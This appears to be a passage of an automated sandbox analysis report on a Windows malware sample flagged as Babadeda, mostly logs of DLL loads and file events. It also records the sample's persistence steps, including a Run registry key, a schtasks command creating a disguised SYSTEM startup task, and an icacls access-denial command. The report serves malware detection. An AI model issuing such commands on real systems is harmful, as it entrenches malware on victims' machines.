Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Yara detected Babadeda

Source: Yara match	File source: nkYzjyrKYK.exe, type: SAMPLE
Source: Yara match	File source: 0.2.nkYzjyrKYK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.nkYzjyrKYK.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

Code function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0040ADD6

Source: nkYzjyrKYK.exe

Static PE information: section name: .code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD3465D2A5 pushad ; iretd	25_2_00007FFD3465D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD34842316 push 8B485F94h; iretd	25_2_00007FFD3484231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD3467D2A5 pushad ; iretd	30_2_00007FFD3467D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD34792325 push eax; iretd	30_2_00007FFD3479233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD3479C2C5 push ebx; iretd	30_2_00007FFD3479C2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD34862316 push 8B485F92h; iretd	30_2_00007FFD3486231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFD3467D2A5 pushad ; iretd	34_2_00007FFD3467D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFD34862316 push 8B485F92h; iretd	34_2_00007FFD3486231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD3464D2A5 pushad ; iretd	35_2_00007FFD3464D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD3476BCB7 pushad ; retf	35_2_00007FFD3476BCB6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD347600BD pushad ; iretd	35_2_00007FFD347600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD3476BBFB pushad ; retf	35_2_00007FFD3476BCB6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD34832316 push 8B485F95h; iretd	35_2_00007FFD3483231B

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\reg.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run windows-app

Jump to behavior

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\reg.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run windows-app

Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run windows-app			Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run windows-app			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49714 -> 2024

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\appcompat\ssh" /deny user:F

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
